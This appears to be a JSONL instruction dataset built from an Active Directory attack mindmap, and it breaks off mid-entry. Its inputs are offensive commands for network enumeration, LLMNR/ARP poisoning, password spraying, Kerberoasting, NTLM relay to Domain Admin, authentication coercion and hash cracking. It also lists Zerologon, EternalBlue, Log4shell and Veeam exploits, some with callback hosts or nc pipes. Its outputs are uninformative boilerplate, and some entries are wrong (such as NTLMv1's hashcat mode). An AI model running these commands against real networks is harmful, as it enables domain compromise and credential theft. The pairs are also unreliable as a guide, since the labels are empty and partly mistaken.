{"instruction": "Scan Network", "input": "nxc smb ", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "Scan Network", "input": "nmap -sU -sC -sV -oA ", "output": "Network/service scan or enumeration command (Nmap) with specified options."} {"instruction": "Scan Network", "input": "nmap -Pn -sC -sV -p- -oA ", "output": "Network/service scan or enumeration command (Nmap) with specified options."} {"instruction": "Scan Network", "input": "nmap -Pn -sC -sV -oA ", "output": "Network/service scan or enumeration command (Nmap) with specified options."} {"instruction": "Scan Network", "input": "nmap -Pn --script smb-vuln* -p139,445 ", "output": "Network/service scan or enumeration command (Nmap) with specified options."} {"instruction": "Scan Network", "input": "nmap -Pn -sV --top-ports 50 --open ", "output": "Network/service scan or enumeration command (Nmap) with specified options."} {"instruction": "Scan Network", "input": "nmap -sP -p ", "output": "Network/service scan or enumeration command (Nmap) with specified options."} {"instruction": "Find DC IP", "input": "nmap -p 88 --open ", "output": "Network/service scan or enumeration command (Nmap) with specified options."} {"instruction": "Find DC IP", "input": "nslookup -type=SRV _ldap._tcp.dc._msdcs.", "output": "Tool or command referenced under 'Find DC IP'."} {"instruction": "Find DC IP", "input": "nmcli dev show ", "output": "Note or procedural step under 'Find DC IP'."} {"instruction": "Zone Transfer", "input": "dig axfr @", "output": "Tool or command referenced under 'Zone Transfer'."} {"instruction": "Anonymous & Guest access on SMB shares", "input": "smbclient -U '%' -L //", "output": "SMB client usage to list or access network shares."} {"instruction": "Anonymous & Guest access on SMB shares", "input": "enum4linux-ng.py -a -u '' -p '' ", "output": "Note or procedural step under 'Anonymous & Guest access on SMB shares'."} {"instruction": "Anonymous & Guest access on SMB shares", "input": "nxc smb -u 'a' -p ''", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "Anonymous & Guest access on SMB shares", "input": "nxc smb -u '' -p '", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "Enumerate LDAP:", "input": "ldapsearch -x -H -s base", "output": "Tool or command referenced under 'Enumerate LDAP:'."} {"instruction": "Enumerate LDAP:", "input": "nmap -n -sV --script 'ldap*' and not brute -p 389 ", "output": "Network/service scan or enumeration command (Nmap) with specified options."} {"instruction": "Enumerate Users:", "input": "nxc smb --rid-brute 10000 # bruteforcing RID", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "Enumerate Users:", "input": "nxc smb --users", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "Enumerate Users:", "input": "net rpc group members 'Domain Users' -W ' -l -U '%'", "output": "Note or procedural step under 'Enumerate Users:'."} {"instruction": "Bruteforce users:", "input": "kerbrute userenum -d ", "output": "Tool or command referenced under 'Bruteforce users:'."} {"instruction": "Bruteforce users:", "input": "nmap -p 88 --script=krb5-enum-users --script-args=\"krb5-enum-users.realm='',userdb=\" ", "output": "Network/service scan or enumeration command (Nmap) with specified options."} {"instruction": "Poisoning:", "input": "LLMNR / NBTNS / MDNS", "output": "Note or procedural step under 'Poisoning:'."} {"instruction": "Poisoning:", "input": "responder -l ", "output": "Tool or command referenced under 'Poisoning:'."} {"instruction": "Poisoning:", "input": "DHCPv6 (IPv6 prefered to IPv4)", "output": "Note or procedural step under 'Poisoning:'."} {"instruction": "Poisoning:", "input": "mitm6 -d ", "output": "Tool or command referenced under 'Poisoning:'."} {"instruction": "Poisoning:", "input": "bettercap", "output": "Tool or command referenced under 'Poisoning:'."} {"instruction": "Poisoning:", "input": "ARP Poisoning", "output": "Note or procedural step under 'Poisoning:'."} {"instruction": "Poisoning:", "input": "bettercap", "output": "Tool or command referenced under 'Poisoning:'."} {"instruction": "Poisoning:", "input": "asreqroast", "output": "Note or procedural step under 'Poisoning:'."} {"instruction": "Poisoning:", "input": "Pcredz -i -v", "output": "Note or procedural step under 'Poisoning:'."} {"instruction": "Unauthenticated PetitPotam (CVE-2022-26925)", "input": "petitpotam.py -d ", "output": "Note or procedural step under 'Unauthenticated PetitPotam (CVE-2022-26925)'."} {"instruction": "no password", "input": "pxethief.py 1", "output": "Note or procedural step under 'no password'."} {"instruction": "no password", "input": "pxethief.py 2 ", "output": "Note or procedural step under 'no password'."} {"instruction": "password protected", "input": "tftp -i GET \"\\xxx\\boot.var\"", "output": "Note or procedural step under 'password protected'."} {"instruction": "password protected", "input": "pxethief.py 5 '\\xxx\\boot.var'", "output": "Note or procedural step under 'password protected'."} {"instruction": "password protected > TimeRoasting", "input": "timeroast.py -o ", "output": "Note or procedural step under 'password protected > TimeRoasting'."} {"instruction": "Quick Compromise: > Zerologon (unsafe) CVE-2020-1472", "input": "zerologon-scan '' ''", "output": "Note or procedural step under 'Quick Compromise: > Zerologon (unsafe) CVE-2020-1472'."} {"instruction": "Quick Compromise: > Zerologon (unsafe) CVE-2020-1472", "input": "cve-2020-1472-exploit.py ", "output": "Note or procedural step under 'Quick Compromise: > Zerologon (unsafe) CVE-2020-1472'."} {"instruction": "Eternal Blue MS17-010:", "input": "msf> exploit/windows/smb/ms17_010_eternalblue # SMBv1 only", "output": "Tool or command referenced under 'Eternal Blue MS17-010:'."} {"instruction": "Eternal Blue MS17-010: > Tomcat/Jboss Manager", "input": "msf> auxiliary/scanner/http/tomcat_enum", "output": "Tool or command referenced under 'Eternal Blue MS17-010: > Tomcat/Jboss Manager'."} {"instruction": "Eternal Blue MS17-010: > Tomcat/Jboss Manager", "input": "msf> exploit/multi/http/tomcat_mgr_deploy", "output": "Tool or command referenced under 'Eternal Blue MS17-010: > Tomcat/Jboss Manager'."} {"instruction": "Java RMI:", "input": "msf> use exploit/multi/misc/java_rmi_server", "output": "Tool or command referenced under 'Java RMI:'."} {"instruction": "Java Serialiszed port:", "input": "ysoserial.jar '' |nc ", "output": "Note or procedural step under 'Java Serialiszed port:'."} {"instruction": "Log4shell:", "input": "${jndi:ldap://:/o=reference}", "output": "Note or procedural step under 'Log4shell:'."} {"instruction": "Database:", "input": "msf> use auxiliary/admin/mssql/mssql_enum_sql_logins", "output": "Tool or command referenced under 'Database:'."} {"instruction": "Exchange:", "input": "Proxyshell", "output": "Note or procedural step under 'Exchange:'."} {"instruction": "Exchange:", "input": "proxyshell_rce.py -u https:// -e administrator@", "output": "Note or procedural step under 'Exchange:'."} {"instruction": "Veeam:", "input": "CVE-2023-27532 (creds Veeam backup)", "output": "Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance."} {"instruction": "Veeam:", "input": "VeeamHax.exe --target ", "output": "Note or procedural step under 'Veeam:'."} {"instruction": "Veeam:", "input": "CVE-2023-27532 net.tcp:/:/", "output": "Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance."} {"instruction": "Veeam:", "input": "CVE-2024-29849 (auth bypass - Veeam Backup Enterprise Manager)", "output": "Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance."} {"instruction": "Veeam:", "input": "CVE-2024-29849.py --target https://:/ --callback-server :", "output": "Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance."} {"instruction": "Veeam:", "input": "CVE-2024-29855 (auth bypass - Veeam Recovery Orchestrator)", "output": "Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance."} {"instruction": "Veeam:", "input": "CVE-2024-29855.py --start_time --end_time --username @ --target https://:/", "output": "Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance."} {"instruction": "Veeam:", "input": "CVE-2024-40711 (unserialize - Veeam backup)", "output": "Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance."} {"instruction": "Veeam:", "input": "CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://:8000/trigger --targetveeam ", "output": "Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance."} {"instruction": "GLPI:", "input": "CVE-2022-35914", "output": "Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance."} {"instruction": "GLPI:", "input": "/vendor/htmlawed/htmlawed/htmLawedTest.php", "output": "Note or procedural step under 'GLPI:'."} {"instruction": "GLPI:", "input": "CVE_2023_41320", "output": "Note or procedural step under 'GLPI:'."} {"instruction": "GLPI:", "input": "cve_2023_41320.py -u -p -t ", "output": "Note or procedural step under 'GLPI:'."} {"instruction": "GLPI: > Weak websites / services", "input": "nuclei", "output": "Note or procedural step under 'GLPI: > Weak websites / services'."} {"instruction": "GLPI: > Weak websites / services", "input": "nuclei -target ", "output": "Note or procedural step under 'GLPI: > Weak websites / services'."} {"instruction": "GLPI: > Weak websites / services", "input": "nessus", "output": "Note or procedural step under 'GLPI: > Weak websites / services'."} {"instruction": "Password Spray", "input": "Get password policy (you need creds,but you should get the policy first to avoid locking accounts)", "output": "Note or procedural step under 'Password Spray'."} {"instruction": "Password Spray", "input": "default policy", "output": "Note or procedural step under 'Password Spray'."} {"instruction": "Password Spray", "input": "nxc smb -u '' -p '' -pass-pol", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "Password Spray", "input": "Get-ADDefaultDomainPasswordPolicy", "output": "Note or procedural step under 'Password Spray'."} {"instruction": "Password Spray", "input": "ldeep ldap -u -p -d -s ldap:// domain_policy", "output": "Note or procedural step under 'Password Spray'."} {"instruction": "Password Spray", "input": "Fined Policy (Privileged)", "output": "Note or procedural step under 'Password Spray'."} {"instruction": "Password Spray", "input": "ldapsearch-ad.py --server -d -u -p --type pass-pol", "output": "Tool or command referenced under 'Password Spray'."} {"instruction": "Password Spray", "input": "Get-ADFineGainedPasswordPolicy -filter *", "output": "Note or procedural step under 'Password Spray'."} {"instruction": "Password Spray", "input": "ldeep ldap -u -p -d -s ldap:// pso # can also be runned with a low priv account but less information will be available", "output": "Note or procedural step under 'Password Spray'."} {"instruction": "Password Spray", "input": "user == password", "output": "Note or procedural step under 'Password Spray'."} {"instruction": "Password Spray", "input": "nxc smb -u -p --no-bruteforce --continue-on-success", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "Password Spray", "input": "sprayhound -U -d -dc # add --lower to lowercase and --upper to uppercase. Add nothing to get only user=pass", "output": "Note or procedural step under 'Password Spray'."} {"instruction": "Password Spray", "input": "usuals passwords (SeasonYear!, Company123, ...)", "output": "Note or procedural step under 'Password Spray'."} {"instruction": "Password Spray", "input": "nxc smb -u -p --continue-on-success", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "Password Spray", "input": "sprayhound -U -p -d -dc ", "output": "Note or procedural step under 'Password Spray'."} {"instruction": "Password Spray", "input": "kerbrute passwordspray -d ", "output": "Tool or command referenced under 'Password Spray'."} {"instruction": "ASREPRoast", "input": "List ASREPRoastable Users (need creds)", "output": "Note or procedural step under 'ASREPRoast'."} {"instruction": "ASREPRoast", "input": "Bloodhound: MATCH (u:User) WHERE u.dontreqpreauth = true AND u.enabled = true RETURN u", "output": "Note or procedural step under 'ASREPRoast'."} {"instruction": "ASREPRoast", "input": "nxc ldap -u -p '' --asreproast ", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "ASREPRoast", "input": "ASREP roasting", "output": "Note or procedural step under 'ASREPRoast'."} {"instruction": "ASREPRoast", "input": "GetNPUsers.py / -usersfile -format hashcat -outputfile ", "output": "Tool or command referenced under 'ASREPRoast'."} {"instruction": "ASREPRoast", "input": "nxc ldap -u -p '' --asreproast ", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "ASREPRoast", "input": "Rubeus.exe asreproast /format:hashcat", "output": "Tool or command referenced under 'ASREPRoast'."} {"instruction": "ASREPRoast > Blind Kerberoasting", "input": "Rubeus.exe keberoast /domain: /dc: /nopreauth: /spns:", "output": "Tool or command referenced under 'ASREPRoast > Blind Kerberoasting'."} {"instruction": "ASREPRoast > Blind Kerberoasting", "input": "GetUserSPNs.py -no-preauth \"\" -usersfile \"\" -dc-host \"\" \"\"/", "output": "Tool or command referenced under 'ASREPRoast > Blind Kerberoasting'."} {"instruction": "ASREPRoast > Blind Kerberoasting", "input": "CVE-2022-33679", "output": "Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance."} {"instruction": "ASREPRoast > Blind Kerberoasting", "input": "CVE-2022-33679.py / ", "output": "Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance."} {"instruction": "Listen", "input": "Respinder -l #use --lm to force downgrade", "output": "Note or procedural step under 'Listen'."} {"instruction": "Listen", "input": "smbclient.py", "output": "SMB client usage to list or access network shares."} {"instruction": "NTLM relay", "input": "MS-08-068 self relay", "output": "Note or procedural step under 'NTLM relay'."} {"instruction": "NTLM relay", "input": "msf>exploit/windows/smb_smb_relay #windows 2000 / windows 2008 server", "output": "Tool or command referenced under 'NTLM relay'."} {"instruction": "NTLM relay", "input": "smb -> LDAP(S)", "output": "Note or procedural step under 'NTLM relay'."} {"instruction": "NTLM relay", "input": "NTLMv1", "output": "Note or procedural step under 'NTLM relay'."} {"instruction": "NTLM relay", "input": "remove mic (no CVE needed)", "output": "Note or procedural step under 'NTLM relay'."} {"instruction": "NTLM relay", "input": "NTLMv2", "output": "Note or procedural step under 'NTLM relay'."} {"instruction": "NTLM relay", "input": "remove mic (CVE-2019-10140)", "output": "Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance."} {"instruction": "NTLM relay", "input": "HTTP(S) -> LDAP(S)", "output": "Note or procedural step under 'NTLM relay'."} {"instruction": "NTLM relay", "input": "Usually from webdev coerce", "output": "Note or procedural step under 'NTLM relay'."} {"instruction": "NTLM relay > To LDAP(S)", "input": "Relay to LDAP if LDAP signing and LDAPS channel binding not enfoeced (default)", "output": "Note or procedural step under 'NTLM relay > To LDAP(S)'."} {"instruction": "NTLM relay > To LDAP(S)", "input": "ntlmrelayx.py -t ldaps:// --remove-mic -smb2support --add-computer --delegate-access #RBCD", "output": "Note or procedural step under 'NTLM relay > To LDAP(S)'."} {"instruction": "NTLM relay > To LDAP(S)", "input": "ntlmrelayx.py -t ldaps:// --remove-mic -smb2support --shadow-credentials --shadow-target '' #Shadow Credentials", "output": "Note or procedural step under 'NTLM relay > To LDAP(S)'."} {"instruction": "NTLM relay > To LDAP(S)", "input": "ntlmrelayx.py -t ldaps:// --remove-mic -smb2support --escalate-user #Domain Admin", "output": "Note or procedural step under 'NTLM relay > To LDAP(S)'."} {"instruction": "NTLM relay > To LDAP(S)", "input": "ntlmrelayx.py -t ldaps:// --remove-mic -smb2support --interactive # connect to ldap_shell with nc 127.0.0.1 10111 #LDAP SHELL", "output": "Note or procedural step under 'NTLM relay > To LDAP(S)'."} {"instruction": "NTLM relay > To LDAP(S) > To SMB", "input": "Relay to SMB (if SMB is not signed)", "output": "Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB'."} {"instruction": "NTLM relay > To LDAP(S) > To SMB", "input": "Find SMB not signed targets (default if not a Domain controler)", "output": "Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB'."} {"instruction": "NTLM relay > To LDAP(S) > To SMB", "input": "nxc smb --gen-relay-list smb_unsigned_ips.txt", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "NTLM relay > To LDAP(S) > To SMB", "input": "ntlmrelayx.py -tf smb_unsigned_ips.txt -smb2support [--ipv6] -socks #SMB Socks", "output": "Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB'."} {"instruction": "NTLM relay > To LDAP(S) > To SMB > TO HTTP", "input": "Relay to CA web enrollement", "output": "Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP'."} {"instruction": "NTLM relay > To LDAP(S) > To SMB > TO HTTP", "input": "Relay to WSUS", "output": "Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP'."} {"instruction": "NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL", "input": "ntlmrelayx.py -t mssql:// [-smb2support] -socks", "output": "Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL'."} {"instruction": "NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON", "input": "Zero-Logon (safe method) (CVE-202-1472)", "output": "Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'."} {"instruction": "NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON", "input": "Relay one dc to another", "output": "Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'."} {"instruction": "NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON", "input": "ntlmrelayx.py -t dcsync:// -smb2support -auth-smb :", "output": "Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'."} {"instruction": "NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON", "input": "To HTTP", "output": "Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'."} {"instruction": "NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON", "input": "krbrelayx.py -t 'http:///certsrv/certfnsh.asp' --adcs --template DomainController -v '$' -ip ", "output": "Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'."} {"instruction": "NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB", "input": "same as NTLM relay, use krbrelayx.py", "output": "Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB'."} {"instruction": "NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB > SMB -> LDAP(S)", "input": "same as NTLM relay, use krbrelayx.py", "output": "Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB > SMB -> LDAP(S)'."} {"instruction": "LM (299bd128c1101fd6)", "input": "john --format=lm hash.txt --wordlist=", "output": "Tool or command referenced under 'LM (299bd128c1101fd6)'."} {"instruction": "LM (299bd128c1101fd6)", "input": "hashcat -m 3000 -a 0 hash.txt ", "output": "Tool or command referenced under 'LM (299bd128c1101fd6)'."} {"instruction": "NT (b4b9b02e6f09a9bd760...)", "input": "john --format=nt hash.txt --wordlist=", "output": "Tool or command referenced under 'NT (b4b9b02e6f09a9bd760...)'."} {"instruction": "NT (b4b9b02e6f09a9bd760...)", "input": "hashcat -m 1000 -a 0 hash.txt ", "output": "Tool or command referenced under 'NT (b4b9b02e6f09a9bd760...)'."} {"instruction": "NTLMv1 (user::85D5BC...)", "input": "john --format=netntlm hash.txt --wordlist=", "output": "Tool or command referenced under 'NTLMv1 (user::85D5BC...)'."} {"instruction": "NTLMv1 (user::85D5BC...)", "input": "hashcat -m 1000 -a 0 hash.txt ", "output": "Tool or command referenced under 'NTLMv1 (user::85D5BC...)'."} {"instruction": "NTLMv1 (user::85D5BC...)", "input": "crack.sh", "output": "Note or procedural step under 'NTLMv1 (user::85D5BC...)'."} {"instruction": "NTLMv2 (user::N46iSNek...)", "input": "john --format=netntlmv2 hash.txt --wordlist=", "output": "Tool or command referenced under 'NTLMv2 (user::N46iSNek...)'."} {"instruction": "NTLMv2 (user::N46iSNek...)", "input": "hashcat -m 5600 -a 0 hash.txt ", "output": "Tool or command referenced under 'NTLMv2 (user::N46iSNek...)'."} {"instruction": "Kerberos 5 TGS ($krb5tgs$23$...)", "input": "john --format=krb5tgs hash.txt --wordlist=", "output": "Tool or command referenced under 'Kerberos 5 TGS ($krb5tgs$23$...)'."} {"instruction": "Kerberos 5 TGS ($krb5tgs$23$...)", "input": "hashcat -m 13100 -a 0 hash.txt ", "output": "Tool or command referenced under 'Kerberos 5 TGS ($krb5tgs$23$...)'."} {"instruction": "($krb5tgs$17...)", "input": "hashcat -m 19600 -a 0 hash.txt ", "output": "Tool or command referenced under '($krb5tgs$17...)'."} {"instruction": "Kerberos ASREP ($krb5asrep$23...)", "input": "hashcat -m 18200 -a 0 hash.txt ", "output": "Tool or command referenced under 'Kerberos ASREP ($krb5asrep$23...)'."} {"instruction": "($DCC2$10240...)", "input": "hashcat -m 2100 -a 0 hash.txt ", "output": "Tool or command referenced under '($DCC2$10240...)'."} {"instruction": "($DCC2$10240...)", "input": "Timeroast hash ($sntp-ms$...)", "output": "Note or procedural step under '($DCC2$10240...)'."} {"instruction": "($DCC2$10240...)", "input": "hashcat -m 31300 -a 3 hash.txt -w 3 ?l?l?l?l?l?l?l", "output": "Tool or command referenced under '($DCC2$10240...)'."} {"instruction": "pxe hash ($sccm$aes128$...)", "input": "hashcat -m 19850 -a 0 hash.txt ", "output": "Tool or command referenced under 'pxe hash ($sccm$aes128$...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "Find all users", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "GetADUsers.py -all -dc-ip /", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "nxc smb -u '' -p '' --users", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "Enumerate SMB share", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "nxc smb -u '' -p '' -M spider_plus", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "xc smb -u '' -p '' --shares [--get-file \\\\ ]", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "manspider -c passw -e -d -u -p ", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "Bloodhound Legacy", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "bloodhound-python -d -u -p -gc -c all", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "rusthound -d -u '@' -p '' -o -z", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "import-module sharphound.ps1;invoke-bloodhound -collectionmethod all -domain ", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "sharphound.exe -c all -d ", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "Bloodhound CE", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "bloodhound-python -d -u -p -gc -c all", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "rusthound-ce -d -u '@' -p '' -o -z --ldap-filter=(objectGuid=*)", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "sharphound.exe -c all -d ", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "SOAPHound.exe -c c:\\temp\\cache.txt --bhdump -o c:\\temp\\bloodhound-output --autosplit --threshold 900", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "Enumerate Ldap", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "ldeep ldap -u -p '' -d -s ldap:// all ", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "ldapdomaindump.py -u -p -o ldap://:389", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "ldapsearch-ad.py -l -d -u -p '' -o -t all", "output": "Tool or command referenced under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "Enumerate DNS", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Classic Enumeration (users, shares, ACL, delegation, ...)", "input": "adidnsdump -u \\\\ -p \"\" --print-zones #New targets (low hanging fruit)", "output": "Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'."} {"instruction": "Enumerate ADCS", "input": "certify.exe find", "output": "Note or procedural step under 'Enumerate ADCS'."} {"instruction": "Enumerate ADCS", "input": "certipy find -u @ -p '' -dc-ip ", "output": "Note or procedural step under 'Enumerate ADCS'."} {"instruction": "Enumerate SCCM", "input": "sccmhunter.py find -u -p -d -dc-ip -debug", "output": "Note or procedural step under 'Enumerate SCCM'."} {"instruction": "Enumerate SCCM", "input": "ldeep ldap -u -p -d -s ldap:// sccm", "output": "Note or procedural step under 'Enumerate SCCM'."} {"instruction": "Enumerate SCCM", "input": "SharpSCCM.exe local site-info", "output": "Note or procedural step under 'Enumerate SCCM'."} {"instruction": "Scan Auto", "input": "from BH result", "output": "Note or procedural step under 'Scan Auto'."} {"instruction": "Scan Auto", "input": "AD-miner -c -cf Report -u -p ", "output": "Note or procedural step under 'Scan Auto'."} {"instruction": "Scan Auto", "input": "PingCastle.exe --healthcheck --server ", "output": "Note or procedural step under 'Scan Auto'."} {"instruction": "Scan Auto", "input": "Import-Module .\\adPEAS.ps1; Invoke-adPEAS -Domain '' -Server ''", "output": "Note or procedural step under 'Scan Auto'."} {"instruction": "Kerberoasting", "input": "MATCH (u:User) WHERE u.hasspn=true AND u.enabled = true AND NOT u.objectid ENDS WITH '-502' AND NOT COALESCE(u.gmsa, false) = true AND NOT COALESCE(u.msa, false) = true RETURN u", "output": "Note or procedural step under 'Kerberoasting'."} {"instruction": "Kerberoasting", "input": "GetUserSPNs.py -request -dc-ip /:", "output": "Tool or command referenced under 'Kerberoasting'."} {"instruction": "Kerberoasting", "input": "Rubeus.exe kerberoast", "output": "Tool or command referenced under 'Kerberoasting'."} {"instruction": "Coerce", "input": "Drop file", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Coerce", "input": ".lnk", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Coerce", "input": "nxc smb -u '' -p '' -M slinky -o NAME= SERVER=", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "Coerce", "input": ".scf", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Coerce", "input": "nxc smb -u '' -p '' -M sucffy -o NAME= SERVER=", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "Coerce", "input": ".url", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Coerce", "input": "[InternetShortcut]... IconFile=\\\\\\%USERNAME%.icon", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Coerce", "input": "Other files", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Coerce", "input": "ntlm_theft.py -g all -s -f test", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Coerce", "input": "Webdav", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Coerce", "input": "Enable webclient", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Coerce", "input": ".searchConnector-ms", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Coerce", "input": "nxc smb -u '' -p '' -M drop-sc", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "Coerce", "input": "add attack computer in dns", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Coerce", "input": "dnstool.py -u \\ -p --record --action add --data ", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Coerce", "input": "Launch coerce with @80/x as target", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Coerce", "input": "RPC call", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Coerce", "input": "printerbug.py /:@ ", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Coerce", "input": "petitpotam.py -d -u -p ", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Coerce", "input": "coercer.py -d -u -p -t -l ", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Coerce", "input": "Coerce kerberos", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Coerce", "input": "dnstool.py -u \"\\\" -p '' -d \"\" --action add \"\" -r \"1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA\" --tcp", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Coerce", "input": "petitpotam.py -u '' -p '' -d '1UWh...' ", "output": "Note or procedural step under 'Coerce'."} {"instruction": "Intra ID Connect", "input": "Find MSOL", "output": "Note or procedural step under 'Intra ID Connect'."} {"instruction": "Intra ID Connect", "input": "nxc ldap -u '' 